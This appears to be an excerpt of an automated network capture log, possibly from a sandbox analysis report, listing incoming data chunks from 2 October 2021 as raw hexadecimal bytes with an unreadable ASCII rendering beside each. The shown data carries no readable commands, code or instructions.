2021-10-02 16:13:23 UTC	31	IN	Data Raw: bd 36 85 29 0d 37 ca 64 a6 1a 16 bb 37 62 16 b7 5e 26 ce b8 da 39 29 06 ed 36 a4 94 b8 3d 5d 29 55 b3 ee 2b d6 50 75 5d f6 c2 38 d9 e6 1d 79 71 f8 2b 1b 7b b3 a4 de 8f ef 33 86 c9 b5 57 0f 5a 72 4f fa a5 90 a8 be 5d 9e b5 df f2 22 99 70 11 1f 5b 6e d2 e3 a5 c4 6b 0f b6 b6 8a d4 1c 8c 9b 34 c2 4a 94 95 59 41 29 7d f7 ec 5d 90 55 a1 b6 bf aa d0 56 02 e4 2e 53 26 6c b5 ca 57 fb 56 92 83 4c c3 1d de 51 de 59 2d 76 5b 64 81 3a cb 6a 91 6a 94 43 f5 b2 26 a2 6c b5 03 57 05 24 82 0e 74 78 86 cc b4 e3 6d 3d 09 a6 c9 53 b2 64 ba 94 b8 96 98 53 2a 71 1e 8a d1 09 28 29 2e 21 96 02 d2 85 73 1f 2b 42 54 a2 4a 30 8a 48 48 0a 50 29 05 b3 76 df 9e b0 ea 52 48 2b 07 b3 a9 7a 02 05 6b c2 21 d3 4f 72 3a a5 ff 00 f0 e0 ad 68 65 0b 41 2e ea 8e da 4b da 94 35 6c a7 5f 3c af 53 Data Ascii: 6)7d7b^&9)6=])U+Pu]8yq+{3WZrO]"p[nk4JYA)}]UV.S&lWVLQY-v[d:jjC&lW$txm=SdS*q().!s+BTJ0HHP)vRH+zk!Or:heA.K5l_<S
2021-10-02 16:13:23 UTC	32	IN	Data Raw: f5 06 a1 46 a7 3f cf 99 48 a8 a6 85 f9 7b 90 2a 4a 75 d4 44 75 e8 ca 41 4b 89 d3 ae b5 48 b3 ce 0a 97 31 09 98 56 92 94 a7 32 97 d4 0c cd 73 e5 58 e3 f6 cb 63 ee 2d ba b8 6f 1d 9f bf 2c f6 69 d2 ad 76 73 2e 44 d9 f6 09 76 c9 96 39 eb 25 08 b5 59 8a e5 ad 72 a7 4a 24 2b 1a 40 01 21 c9 19 8f a2 6e 14 71 af 2a 76 82 e1 65 3b 3b 65 4f 47 72 44 56 60 37 9a 72 94 48 6b 53 99 6b 3d 55 9a 99 4d 7a 8f 52 77 d1 92 5d a1 d7 63 33 19 ba 74 8a ad 21 71 55 57 54 6a da 6a c2 4d 6a b1 16 07 96 de b6 39 97 64 e5 49 08 52 93 31 64 a0 e1 38 41 27 e9 0a 60 f4 1b 83 67 cb f2 c7 6e 76 0a fd e8 fb 69 ed 1b 39 7c 26 74 c9 e9 93 39 57 55 f3 6b ff 00 05 9e f5 bb 2c f3 92 7a d9 09 41 32 c4 c9 69 05 33 10 26 28 a5 ea 29 5b c5 51 31 d0 b3 23 9c ea 18 a7 96 e2 28 30 e2 13 1d e9 49 75 Data Ascii: F?H{JuDuAKH1V2sXc-o,ivs.Dv9%YrJ$+@!nqve;;eOGrDV`7rHkSk=UMzRw]c3t!qUWTjjMj9dIR1d8A'`gnvi9\|&t9WUk,zA2i3&()[Q1#(0Iu
2021-10-02 16:13:23 UTC	33	IN	Data Raw: 1f 53 17 25 04 0c 5f 07 c7 85 63 d4 14 db bc 12 6f ee fe 3c f1 09 43 82 78 16 f9 ce 9f 88 45 ad a9 bc b7 b1 19 79 c2 c2 44 25 45 27 e0 85 89 4c da b6 60 70 d3 87 e6 20 d4 93 c6 11 dc 11 e3 89 57 d4 7b bd 04 4e 23 84 27 9f 99 d2 17 87 97 f9 c4 af 3e ef 73 0c 84 82 2a 35 85 81 19 f7 7b 88 16 90 03 8d f0 86 d7 f3 fe df 4c 5b 15 c2 c4 1c 8f 23 e9 04 2c 51 04 31 36 17 c1 04 01 5d c1 16 eb e7 fd b0 10 e1 a0 88 f1 58 40 49 c4 74 e1 53 04 38 b7 78 be 32 93 31 d0 09 34 cb bc 7c e5 e5 04 31 f2 16 f2 c5 20 15 4d 41 d0 a8 3f 02 ff 00 98 83 50 47 08 15 27 57 7d bb b1 90 b4 81 9d 40 ab fa c4 a3 b0 da c1 23 d7 04 f4 b7 bf bb dd 8a 90 b2 a5 33 be 63 97 c6 82 04 2a fa b6 e9 f3 eb f4 c5 c5 65 23 f1 5f b4 10 82 ca 81 48 4e da 8e e7 cb 6f bf a6 31 d6 be b4 57 2e 14 d7 e6 90 Data Ascii: S%_co<CxEyD%E'L`p W{N#'>s5{L[#,Q16]X@ItS8x214\|1 MA?PG'W}@#3ce#_HNo1W.
2021-10-02 16:13:23 UTC	35	IN	Data Raw: 7e dc ca 52 e6 48 54 e9 2e ac 53 28 52 42 0e 69 a7 88 ae 5c 09 8f ba 7a 3d e9 fb a2 fe 91 3a 84 5d b7 cc 9b be d9 31 29 2b b1 5e 93 0c 89 a9 5a df 0a 64 a9 40 26 6b 10 71 e1 76 ec e8 63 0f 53 12 e3 49 92 e6 a7 17 29 f4 ad a2 25 15 46 2d 86 c3 72 e4 c9 74 7f 4d 08 63 98 d7 2d a6 05 96 b2 9d d2 6f b7 2a 54 4a 88 2e 92 33 41 a1 1b 8b 7b f9 47 ba 26 7f 58 92 b9 45 13 ac e0 80 8b 44 b3 8d 05 c5 19 42 9d af 1c db 38 a7 79 71 dd 61 2c ca 4a 8c b9 0a 76 4d f7 6f 4f 3d d4 29 08 73 98 80 88 f1 cb 25 4e 24 0b ac e9 0a 24 95 5b 04 4c c3 89 49 2e 5d c6 79 e7 ed 4c bb e2 99 6d b9 15 ce 43 c1 3a 6e b5 30 ea 4a 8a 5d 69 2b 29 25 0a 5a 53 75 b6 02 12 08 48 04 59 5b dc e2 95 fd 47 bb d0 43 cb cc fc e5 12 a1 ae 61 b5 f7 de c2 fe b6 df f2 1f f1 37 b2 bd b6 ef b8 58 64 a0 26 Data Ascii: ~RHT.S(RBi\z=:]1)+^Zd@&kqvcSI)%F-rtMc-o*TJ.3A{G&XEDB8yqa,JvMoO=)s%N$$[LI.]yLmC:n0J]i+)%ZSuHY[GCa7Xd&
2021-10-02 16:13:23 UTC	36	IN	Data Raw: 97 5f a8 8f 42 84 82 aa c2 dc 91 2a 43 a1 86 99 69 e9 0f 68 08 4a d1 ae b7 cc 93 22 42 e6 cd 3d 58 43 a8 2f 52 a1 50 8d fd a3 96 8f 1a 8b de f6 b0 dc 77 55 e1 7a de 73 93 22 c3 77 d9 27 5a a7 2d 44 27 1a 65 20 a8 a1 24 91 da 20 50 3e b4 a9 8e ad d7 b8 ad c3 1e c0 90 61 f0 53 21 d4 6a 7c 4e cf 50 b3 d4 2a c7 17 2b 75 68 b1 e0 b9 50 a0 d5 d9 13 66 45 82 fc 2a 95 5a 1d 3b 31 53 68 63 2a c5 a2 3b 18 89 94 29 73 33 b8 ab 73 d6 b8 4e 46 e3 a4 58 6d 97 fc f9 d7 84 f4 e1 90 84 19 72 25 e8 b5 24 8e df d4 58 90 1b 42 03 96 ad 3e 32 b4 f4 79 7c 7e a3 2d 56 9d ba be ac 67 67 6e 69 77 55 aa cb b1 45 13 92 26 aa df 67 5c c9 72 d7 69 12 55 32 67 ec ed 8b 38 a7 25 69 4a 16 0a 1d 49 62 4e fb 50 f3 56 5c cd d9 72 8d 9d 32 64 e6 67 e5 2c d9 4d 66 7d 12 aa 82 db 0b b3 8a 9a Data Ascii: _BCihJ"B=XC/RPwUzs"w'Z-D'e $ P>aS!j\|NP+uhPfEZ;1Shc;)s3sNFXmr%$XB>2y\|~-VggniwUE&g\riU2g8%iJIbNPV\r2dg,Mf}
2021-10-02 16:13:23 UTC	37	IN	Data Raw: 28 5b d2 94 a6 ec b9 c5 2a 0e 4b d6 be 94 8a 25 7a 9d 77 e8 36 f6 61 02 4b 3e 83 7e ad 16 a8 62 4d 1e ad 91 68 71 be f8 84 97 53 07 04 50 9f 9c a2 02 59 25 ea 5b 9e 9c 61 77 13 e1 fd fe 98 bd 72 4a b2 03 bb e6 7d d1 08 56 1c f2 f1 84 37 df 18 c0 87 c2 cc cf e5 10 a4 90 5f 42 61 61 a1 61 60 8b 81 ea d2 52 7f 95 7e d5 dd 4f b4 2c 31 4b 07 27 58 ac 0c 44 b9 e3 0b 16 25 41 98 e7 41 fd 77 72 ce 24 a1 83 bf 97 e6 18 9b 6e 71 27 23 c8 fa 42 44 18 a2 08 7b 9e 97 36 c5 49 41 0a 24 92 6a 4d 4f 17 1f 3d 21 02 4e 27 e2 58 7a 40 92 07 5c 5c 25 99 94 1a 56 32 52 18 0d f0 81 b8 be 2b 4a 4a 4a 81 cc 7e 44 2c cd 3b fd a1 b5 27 c7 e4 70 f1 5c 2d ce e1 5b 78 5b 0c 12 e1 c9 61 f9 68 21 10 4f 98 ff 00 89 d8 1f 78 dc 7b b1 20 97 38 4b 86 a3 fc 03 94 10 80 21 0a 4f 79 20 ed f0 Data Ascii: ([*K%zw6aK>~bMhqSPY%[awrJ}V7_Baaa`R~O,1K'XD%AAwr$nq'#BD{6IA$jMO=!N'Xz@\\%V2R+JJJ~D,;'p\-[x[ah!Ox{ 8K!Oy
2021-10-02 16:13:23 UTC	38	IN	Data Raw: 95 20 10 5d b4 50 e0 d4 19 1e 51 b6 ba f6 96 f2 bb 6d 28 55 8a db 6b b2 4d 41 74 2e 42 d4 08 20 be 61 40 8c f4 62 7b a3 d9 a9 1c 51 ca 19 8d 94 c6 cc f1 85 19 d5 ad b4 b7 52 0e b7 50 cb cf ad 40 25 49 6a aa d6 87 e1 a1 64 a5 0a 72 63 71 5b e6 bf a3 d1 f5 00 71 e6 77 ff 00 46 b7 2d ea 66 4e 42 85 92 d5 55 24 cb 40 42 48 00 b8 60 07 d5 4e f8 fb 1b a2 7f d6 56 de ec 20 91 61 bc ed 53 af 9b 9d 2b 4a 66 d9 ed 67 16 30 58 03 d6 28 95 24 80 1c 2b 21 ae 71 90 4d cb 52 d5 79 d4 e5 b7 52 8a a5 b9 35 ab 3c 14 a7 54 ca 12 86 4b 6f a5 4a 0e b3 15 0a bb 6d a9 28 53 8d a8 12 8d 3a 54 af 0f bf 76 2a f4 ba d5 34 ca b2 ae d1 67 94 e4 4d 00 b9 03 50 35 61 a6 75 ef 1f a8 1d 17 7e a5 fa 35 e9 2a 4d 99 32 2d a2 e9 be 96 89 69 5d dd 78 4c 4a 31 4e 53 00 24 4d 7c 2b 96 54 f9 80 Data Ascii: ]PQm(UkMAt.B a@b{QRP@%Ijdrcq[qwF-fNBU$@BH`NV aS+Jfg0X($+!qMRyR5<TKoJm(S:Tv4gMP5au~5M2-i]xLJ1NS$M\|+T
2021-10-02 16:13:23 UTC	39	IN	Data Raw: 59 32 97 c4 4e 26 d1 68 bc 29 a0 e6 4a 6c d6 65 22 bf 3e 13 81 b7 a1 44 7a 3c 59 51 e2 e6 e4 89 b2 7d 31 0f 0a 2c 27 72 d3 06 a3 1e 5b 79 86 0b 92 3c fe fd 49 bc 2f 04 22 cc 90 51 26 51 33 14 91 88 92 08 2f 41 47 c8 92 aa 36 59 c7 c0 5f a9 6b b2 c7 b7 7b 59 3e 6e c8 58 2c 77 bd e5 b3 97 0c fb 66 d3 cf b1 5a 02 e5 4f b3 49 99 28 61 99 d5 f6 55 3a c4 a5 25 49 41 06 62 82 a6 4b a3 01 1b b2 c9 88 d5 d2 dc 67 62 a9 d9 88 8d 35 33 63 68 a9 de 33 8b 6a 71 92 f3 1f d5 d7 1c 43 92 e2 22 ac 68 61 69 42 d0 d2 1b 5b 65 5a 29 38 56 16 ac ba a2 51 96 a0 d5 f8 82 1b 83 52 3e 1f b7 cb 9d 35 7d a9 b3 27 c8 95 28 2a ce 89 24 25 33 17 38 1c 21 8e 12 3a b5 04 a5 4f 5c 2a 39 b9 8e 5d 7e 27 7c 31 8f 53 a0 e4 ce 2e d1 a9 6f bf 2a 8d 29 fc a7 9c 2a ed 49 53 cd fa 04 8d 13 32 c8 Data Ascii: Y2N&h)Jle">Dz<YQ}1,'r[y<I/"Q&Q3/AG6Y_k{Y>nX,wfZOI(aU:%IAbKgb53ch3jqC"haiB[eZ)8VQR>5}'($%38!:O\9]~'\|1S.o)IS2
2021-10-02 16:13:23 UTC	41	IN	Data Raw: 78 20 90 e9 52 80 3e ef 6f cb 0e 42 30 ba 45 75 a9 f9 dd c7 3d e4 0a 82 46 ca de d7 f1 f7 f4 c0 84 85 24 6a 48 f9 4c bb a0 86 b2 0d cf 87 5e b8 55 23 01 c2 03 51 e2 59 99 fc e0 52 41 37 3d 76 b7 df 4c 2c 32 b0 b2 70 86 cd f8 e5 bf 77 0a 43 a8 93 ea 8e b7 37 1d 3d 9f 2c 48 ed 10 09 f7 85 04 8a 88 20 0e 9d 3d e4 11 dd d4 de de 58 82 0e 59 31 af db f3 01 24 e6 61 b4 a4 0d fd fd 71 05 41 39 87 7f 87 5f 68 0a 89 cc c3 28 69 17 4e c7 a7 8f ef 87 ea f0 00 a1 4c 4c 69 c4 66 ef cb ca 1c 2d cf 6e a3 e6 ea c1 27 f4 df a9 dc ef e3 dd d7 16 02 54 81 c4 1a 6e 77 f8 61 54 d8 8b 65 a6 ba 6f 84 4a 95 ea 91 6d bf 55 ef 61 fd bf 9e fc 63 a5 2a 2b 62 58 3f c1 e1 e7 c6 b0 b1 07 7d fb fa 7f 38 14 95 25 43 b4 fc 38 7d fe f1 92 16 e9 61 c5 f7 fc f1 e7 06 74 e9 db ae de 3e ff 00 Data Ascii: x R>oB0Eu=F$jHL^U#QYRA7=vL,2pwC7=,H =XY1$aqA9_h(iNLLif-n'TnwaTeoJmUac*+bX?}8%C8}at>
2021-10-02 16:13:23 UTC	41	IN	Data Raw: 33 39 ee c3 42 2a ff 00 ce 47 4f 36 a9 f3 3a 4f db 89 f3 56 71 4e da 0b 66 37 00 12 b0 40 52 8b d7 20 90 d9 9a 71 8f 8f 4e 2a f1 37 34 71 47 3b e6 7c f3 9e ab f1 66 e6 dc cf 55 99 59 ae 54 1e aa 54 29 cc b7 2a 52 a3 36 18 2c 22 1b 2c b1 4c a5 42 0d 46 a6 c7 bb 88 89 0e 2c 68 89 71 41 20 ab d3 6c b6 79 72 90 01 48 04 87 25 cb 13 e3 bb e6 51 e1 ab 98 aa a9 24 82 32 20 57 9e ba 7d f3 8f 26 12 aa 12 5a 4f e5 d3 2a 8e c6 65 69 61 d3 47 ac 52 ea ec b0 b5 a4 87 a4 08 95 34 b3 21 4d 8b ab 52 12 e2 59 75 fe 5a 49 2b 20 0c ea 36 8d cf e6 ef 28 ad 2a 2a 72 a2 f5 d6 31 3a b3 b0 a4 a5 01 e7 28 49 75 1e 8f a7 f3 ca 4d 47 29 d4 4b 3c b5 17 8b 55 16 80 65 b7 03 ae 1f 47 49 6c b6 a7 1d 4a 43 1c b2 94 e0 04 1c a0 09 02 a0 7a c5 14 b9 52 52 c3 89 90 dd 71 a8 ea 7f 52 cc e8 Data Ascii: 39BGO6:OVqNf7@R qN74qG;\|fUYTT)R6,",LBF,hqA lyrH%Q$2 W}&ZOeiaGR4!MRYuZI+ 6(**r1:(IuMG)K<UeGIlJCzRRqR
2021-10-02 16:13:23 UTC	43	IN	Data Raw: 0c de c8 70 ca 58 ec b5 4b 9a 07 11 d4 9c f3 d9 53 2e 27 f1 08 e2 36 6f e2 14 5a 66 5f e0 b3 90 a8 7c 6b cc 10 a5 b9 48 cb 74 ba c4 ac c5 41 ab 49 a8 d0 91 54 a7 bf 52 6e 2e 5b 6b 33 52 33 45 66 b5 53 08 a7 c7 aa 51 a8 55 4a 6c 56 e2 54 eb 54 56 24 f3 96 2b d2 d1 2b 65 e5 58 e5 2d 4a b6 a6 d2 ab 31 98 ee c8 0b 53 24 51 b2 a0 a3 0c 89 04 88 f0 9b 5f 4a 36 ab 1f 45 57 05 d7 71 22 75 a7 6a 2f d9 c7 66 6c a4 62 33 2c 81 0b 22 d3 36 5a 45 15 32 5c 89 92 d2 84 a7 b6 ec a3 44 29 f4 bf b6 3f 68 99 dd a2 38 c9 5b cc 54 e7 1d ff 00 44 d0 92 32 96 43 2e 46 10 1d 93 95 58 a8 cb 9c dd 7d c8 2c 34 1a a7 d5 b3 b4 d7 65 e6 e7 29 c5 c7 21 d2 05 51 bc a1 15 86 e3 50 a9 ed a3 b3 d9 bb b5 36 0b 2a e6 2d 00 da 2d 49 54 c9 d3 08 72 5c 10 7e a1 d9 dc c0 01 4c cc 7b 3f 44 9d 1e Data Ascii: pXKS.'6oZf_\|kHtAITRn.[k3R3EfSQUJlVTTV$++eX-J1S$Q_J6EWq"uj/flb3,"6ZE2\D)?h8[TD2C.FX},4e)!QP6*--ITr\~L{?D
2021-10-02 16:13:23 UTC	44	IN	Data Raw: c8 08 05 5b 7f 0f 7f 8f c7 13 52 78 98 64 d5 45 eb 48 11 6d 27 48 f1 f7 ed 80 82 28 77 3c 4a 89 49 61 40 db 86 f3 08 5c 24 0b 5f af 78 1d f8 88 40 48 ca 1e d7 1b fc 30 44 12 f5 31 0a ac 09 f0 1f 4c 10 40 05 05 74 ee c1 01 ed 67 5f 2f 48 88 92 7a e2 ec 09 dd e6 7e f0 43 62 a3 99 e6 62 43 3d 72 84 76 4d fb f7 f9 01 88 8b 49 97 84 76 7c cb 98 a7 51 27 db 6d b0 45 30 3a 09 b1 51 ee e9 fe 0f f9 c3 05 28 51 cc 00 b5 44 3d bd bf 13 f5 c1 89 5b fd 21 b1 2b 7f 90 84 6f d4 0b db ce d6 f6 e2 31 2b 79 88 4b a7 e9 f4 7f 57 88 35 27 51 bf 9e c4 91 e1 df df 89 c4 ad f1 70 0d 5d 4e 66 29 c6 d7 f3 fa df 0b 14 92 e5 e1 8f 43 ec 3f b6 19 21 24 b1 2d f3 97 f7 12 92 41 a5 5f 48 83 0e a0 10 7b 24 f7 b1 05 bb 87 c7 ac 32 c6 bd d0 bc be fb fe b8 ac 33 d7 28 ae 0d 3b 8b 69 f7 ff Data Ascii: [RxdEHm'H(w<JIa@\$_x@H0D1L@tg_/Hz~CbbC=rvMIv\|Q'mE0:Q(QD=[!+o1+yKW5'Qp]Nf)C?!$-A_H{$23(;i
2021-10-02 16:13:23 UTC	45	IN	Data Raw: 5e 4b 72 26 37 25 f8 eb 8e a7 61 a1 32 d8 6f 12 86 49 15 2d f7 f0 a6 b0 d8 cf 0f 3f bc 1a 90 fb 4d ae 6c 2a 78 61 a5 b2 c3 a9 99 92 aa 8c b8 da 5b 91 1d 73 9b e6 65 b9 c9 e4 ad 4f 36 b4 f2 f4 b0 ea d0 d8 70 24 59 61 02 f7 7c a1 5d 0e 49 51 7d d4 60 75 f8 7d e2 cd 21 2a 92 f2 e4 21 a6 27 3b c9 4b 4e 3f 41 8e 32 ee 62 65 c7 93 1d 49 e6 d3 25 88 91 e5 a9 4d a0 a1 c6 1d 65 86 01 75 2f b6 da 90 e3 88 72 0b 31 0e db f9 42 e2 4b 96 26 81 f2 f9 97 da 3d 07 25 f0 fe a1 9c 2a 6a 8e ca 5d 96 e2 09 52 9d b7 fa 77 33 c3 4f 2d 48 0a 53 ef a9 88 72 90 18 29 4a d0 9e 5c 15 b6 8e 5b 6e 11 ad e1 af b6 5b 64 5d f6 79 b6 99 ea c3 29 15 5a d4 43 24 31 67 14 f0 ae b1 d2 6c e6 cd 5e bb 49 6b 91 62 bb 2c 96 8b 65 a2 d1 36 5c b4 48 b3 4a 54 e5 af 11 6a 00 ec c4 d5 fb a3 66 29 39 Data Ascii: ^Kr&7%a2oI-?Mlxa[seO6p$Ya\|]IQ}`u}!!';KN?A2beI%Meu/r1BK&=%*j]Rw3O-HSr)J\[n[d]y)ZC$1gl^Ikb,e6\HJTjf)9
2021-10-02 16:13:23 UTC	46	IN	Data Raw: 76 6a db 7e de c4 a6 55 86 52 d7 66 49 00 5a 27 db 27 20 aa cf 63 90 85 05 63 99 3d 64 04 f6 54 c0 b9 60 0b 6d 07 6a 8e 31 d0 f8 3c ec ee cd dc 02 89 48 cb d9 37 2f 65 76 f2 1f 13 33 33 90 e8 b1 f3 47 10 33 24 37 aa e8 cc 29 a9 57 a1 41 55 76 4c 76 9d 32 b2 f5 59 ca 7c c3 4e ad ab d3 db 69 46 08 60 a7 45 76 5d e6 d0 a4 de 36 d0 66 63 59 99 22 5a 83 cb 4a 18 b1 53 b9 c7 93 17 02 94 d6 3c 6f a2 6d 8f be b6 a2 44 ae 92 ba 45 5d a2 d1 7b 5e b6 e9 b7 9d c1 73 cf 99 86 cd 71 5d ca 1f f2 92 c5 90 34 b4 4e 24 89 e1 4a 06 60 29 48 2a cc 47 39 54 5e 4a 1c 53 22 5b 2d 15 37 af d0 e2 c4 a3 c4 5a 47 31 b5 93 2e 62 7d 2d 57 73 d6 76 cc e8 24 28 8f 54 25 23 aa 57 6e 58 0e 52 13 f4 84 e4 c3 f8 9c e9 4a 71 a9 68 fa 43 b1 30 f6 80 5a 9c 2c a8 9f f6 82 1e 9b 93 51 ff 00 70 Data Ascii: vj~URfIZ'' cc=dT`mj1<H7/ev33G3$7)WAUvLv2Y\|NiF`Ev]6fcY"ZJS<omDE]{^sq]4N$J`)H*G9T^JS"[-7ZG1.b}-Wsv$(T%#WnXRJqhC0Z,Qp
2021-10-02 16:13:23 UTC	48	IN	Data Raw: 2c da bc 10 b1 50 aa ab a9 f5 fc c1 09 5f a3 ff 00 bb f6 18 b4 a1 20 3e 23 c4 64 dd f0 45 3e 29 de df 07 18 20 4b 82 f6 f0 db 6f 2f 7e 08 20 4a c5 8f 5f bf 7e 08 20 2e 48 b5 ce 08 b6 51 00 97 1f 9e ee 11 4c b0 14 a3 7e eb 8f bf 86 00 15 ad 4f 07 88 33 0b 96 01 9c b6 79 42 c5 c5 49 48 29 67 c8 70 6a 7b 42 81 89 4c 28 0e fd 35 fe a1 8f 43 ec 38 ab 57 14 f6 81 99 41 f7 8f 58 83 a1 22 d6 b7 f3 88 87 5e 5d fe c6 16 20 b9 14 2c 61 50 ce 77 e9 0f 73 6b 5f 6c 00 10 2b 53 17 28 24 17 0c dc 38 6f 86 c4 c5 25 4e a0 47 01 5e 7c 34 83 b5 c5 c6 a3 bf 42 6f dd 82 2d 80 c3 24 cc 51 08 2a 18 4f 13 cf d6 08 58 14 9c 25 9c 1e 50 aa 20 66 1e 16 16 29 85 82 19 20 28 b1 a8 6f b4 35 f7 23 bc 60 65 66 d4 df eb a6 9c e2 e0 00 a2 43 0d de b0 f8 22 b9 9a 77 fb 43 83 6b f9 82 31 38 Data Ascii: ,P_ >#dE>) Ko/~ J_~ .HQL~O3yBIH)gpj{BL(5C8WAX"^] ,aPwsk_l+S($8o%NG^\|4Bo-$Q*OX%P f) (o5#`efC"wCk18
2021-10-02 16:13:23 UTC	50	IN	Data Raw: 28 ab 29 98 ca eb 11 56 52 da c2 64 07 44 79 1c e9 09 1a 09 d5 cf 66 3a 79 bb de e0 93 7d c9 44 9b 5a 8a a5 07 79 78 e6 25 2a 0a 67 c7 84 87 ca 8f 40 0e 59 c7 af f4 6b d2 bd f7 d1 8d b0 de 1b 3f fb 59 56 d5 a1 23 f7 13 ec d2 2d 13 25 29 0f 84 c9 eb 90 bc 07 b4 4a 99 b1 30 2f 98 8c f9 be 37 64 b9 47 96 9c a7 0d c7 0b af 69 a6 bf 31 c8 d3 d9 43 25 b5 38 ed 36 a2 c3 aa 87 2f 98 9d 69 8c b7 16 e1 57 36 23 ad be f2 5d 75 b6 b9 93 d1 66 cc 4b 02 6a 2c 88 41 62 92 12 a5 a8 1c 55 76 59 f0 39 e9 1e fd 2b f5 bd d3 1c bc 0b 99 b4 62 6f 69 d6 0c 89 00 2b 73 00 81 84 0d 19 a8 78 52 a9 9e 30 f0 f1 f3 20 b7 96 0a 9d 49 61 0b 4b 2f bc d5 66 9e db a1 a5 b2 64 42 68 16 67 32 5b 52 03 4f c5 52 84 c6 24 46 75 9f cc 43 6b 40 d6 ce e8 a6 e1 9a a7 44 b5 a2 b4 52 7f 8e 6c 43 6b Data Ascii: ()VRdDyf:y}DZyx%*g@Yk?YV#-%)J0/7dGi1C%86/iW6#]ufKj,AbUvY9+boi+sxR0 IaK/fdBhg2[ROR$FuCk@DRlCk
2021-10-02 16:13:23 UTC	51	IN	Data Raw: 94 a4 3c b4 86 04 29 6b 7e 62 3f 25 49 d0 eb 2d 96 d0 e8 0b 53 91 e1 c6 a5 b7 77 94 b7 d4 a5 55 6a 86 44 d5 eb 44 c0 a7 15 a2 eb 24 2a fa c1 c7 54 a5 09 69 42 25 a5 a5 80 06 1d ca 14 a3 50 25 bb e3 e9 39 32 25 cb 97 2e 44 ba 26 54 bc 24 90 18 e1 20 25 92 91 85 20 25 80 00 69 48 a2 42 79 ae 95 a0 22 43 a6 ca e7 33 ce aa b8 09 bf 3d 2b 99 50 2d 45 6c af fa 8e 28 80 41 56 bd 85 c1 0e 8a a8 6e 23 bf 23 dd 94 33 04 aa 8d e5 a8 62 29 be a2 2e f4 89 f3 e9 55 68 15 b8 0f 2c ce a0 54 e1 d5 29 ee 07 64 4a 76 2c ca 74 96 27 32 e3 28 88 b6 29 d0 f4 2a 3b 5a 4f a4 25 c4 dd 65 0a be 9c 60 cf 05 48 9d 24 9c 58 f1 00 46 f5 02 3f a6 ee 6d 70 2f 3b 04 bb ca ed b7 d8 27 21 33 2c d6 cb b6 d7 60 9d 2d 4c 71 a2 7c b5 27 50 40 6c 55 70 5f 8b b4 7d 4f e5 49 8c e7 7a 26 55 cd 71 Data Ascii: <)k~b?%I-SwUjDD$TiB%P%92%.D&T$ % %iHBy"C3=+P-El(AVn##3b).Uh,T)dJv,t'2();ZO%e`H$XF?mp/;'!3,`-Lq\|'P@lUp_}OIz&Uq
2021-10-02 16:13:23 UTC	52	IN	Data Raw: 9f 9e 08 b1 04 01 5c de 24 f2 c1 0c b4 92 90 c3 5f bc 31 20 75 c5 f8 52 10 5c ee e6 6b 9f 77 f7 c6 90 1e 82 01 4b da c3 70 7f 7e 9d 31 51 c0 01 a9 a7 db 94 36 05 6e f3 1f 78 8f ef ef e1 89 96 a4 3d 4f 91 a7 96 b9 43 a7 b2 3b 54 af 3d 38 45 c6 99 3d a6 1c 72 3c 96 1a 93 0e 5b 6b 8b 2e 2b e8 e6 31 26 33 a9 2d bc c3 cd 9b 05 36 f3 6a 5a 1c 4a ae 0a 14 a4 ed aa e2 2d 12 a4 4e b3 1b 2c d4 03 26 70 58 9a a6 76 49 dc 2a f4 6c 85 44 6d ee 9b ce 75 d1 7a 58 2f 2b 14 f5 d9 6d 76 25 26 d1 26 7c b7 0a 13 90 42 a5 fd 35 66 0c 72 0d 9f 1e 49 76 92 e0 83 fc 26 cf 7c da 43 6e 7f a1 73 4a a4 d4 f2 cc f7 ee 5a 86 c9 5b 6f 4d a4 c9 7e da 79 94 5e 76 82 a7 14 df 36 19 6d e2 42 92 b2 9f 99 76 b7 66 a7 dd f7 c2 6c d6 69 2b 54 9b 64 ff 00 f9 65 24 38 58 52 b5 a7 65 89 ab 91 df Data Ascii: \$_1 uR\kwKp~1Q6nx=OC;T=8E=r<[k.+1&3-6jZJ-N,&pXvI*lDmuzX/+mv%&&\|B5frIv&\|CnsJZ[oM~y^v6mBvfli+Tde$8XRe
2021-10-02 16:13:23 UTC	53	IN	Data Raw: 74 8a 8e 61 ae 65 6c af 4b 91 57 a2 cb 97 26 ba cc 47 29 d4 8a ff 00 0a 5b af 52 23 c5 81 53 75 4f 3b c2 5a 6f a6 34 99 35 3a 73 12 bc d6 d5 65 b3 dd 17 fc a7 43 48 bc 08 01 2b 0e 15 34 95 24 87 14 48 03 09 ae 60 10 23 e7 f4 df 56 fe 8b fa 5f b1 5a 2c 93 a6 d9 6e 3d ac 1d 58 57 5a 65 cb 95 6a c4 42 a5 84 a4 b9 75 a9 2a 72 cf 8c b1 a1 8e 22 d1 7b 4c 67 6a 63 ad f3 e4 aa 4a 88 f5 b9 ea 12 1a d1 62 87 02 02 81 71 29 01 29 b6 85 b8 50 a0 a0 54 a4 a4 db a4 9b b3 77 75 b7 1a c5 92 4a 52 4b 28 a9 29 2e a6 ae 10 d4 7d ec d1 f6 ad c5 d3 26 dc dc 73 11 3e eb bf 2d 96 25 25 87 58 89 b3 71 e1 49 ec a9 20 a8 66 72 2c 31 01 bb 2f 61 a4 76 a6 a2 ca 01 ac c1 47 8c a5 a8 ad 3a e2 2d 2d a9 ad 04 8b bc 9b 1d 0e 6a b7 a9 ca 40 50 ba 82 53 8e 3e f2 e8 ce e3 b5 29 45 32 57 25 Data Ascii: taelKW&G)[R#SuO;Zo45:seCH+4$H`#V_Z,n=XWZejBu*r"{LgjcJbq))PTwuJRK().}&s>-%%XqI fr,1/avG:--j@PS>)E2W%
2021-10-02 16:13:23 UTC	55	IN	Data Raw: 58 0e fe 9b 79 f8 78 93 89 0e 6a ac f4 d5 87 38 c3 5a 92 a0 30 a4 24 a7 3c aa ee 7e 0a c2 4b a0 1d c7 77 df 76 2d 49 48 19 d7 97 96 51 40 c5 88 be 4d 42 fc 77 72 89 92 e2 55 df ed 16 3f 4c 57 0f 12 92 0d ad e0 3e 38 21 b0 2b 77 98 80 25 20 80 7a f5 1f 5c 58 10 95 27 10 25 b3 35 14 ee ce 20 24 ab 2a f7 88 2b fc b1 5d 34 cb 4e 5a 18 62 85 27 30 dc 5c 7d ff 00 31 0b 85 41 40 0e 84 6f bd bb cf 76 08 52 49 ce 23 26 d6 00 5e f7 ef b7 4c 32 70 eb dd 08 bc 45 80 26 8f af 28 2c 59 8d 3b fc 8f da 21 38 c1 72 4e ba bc 2c 41 28 39 9e f6 2f e9 0f 10 a8 00 a3 61 6e 9f b6 24 29 22 80 fa c1 10 28 9d 47 73 dd df e5 85 5f f1 ef f6 82 18 a8 91 63 bf b7 af 8e 2b 82 00 db 60 7b fa 5c 5f 7c 48 a9 03 8c 58 95 06 a9 f5 80 58 00 0b 0e fc 64 e0 64 82 38 93 c3 e5 7d 21 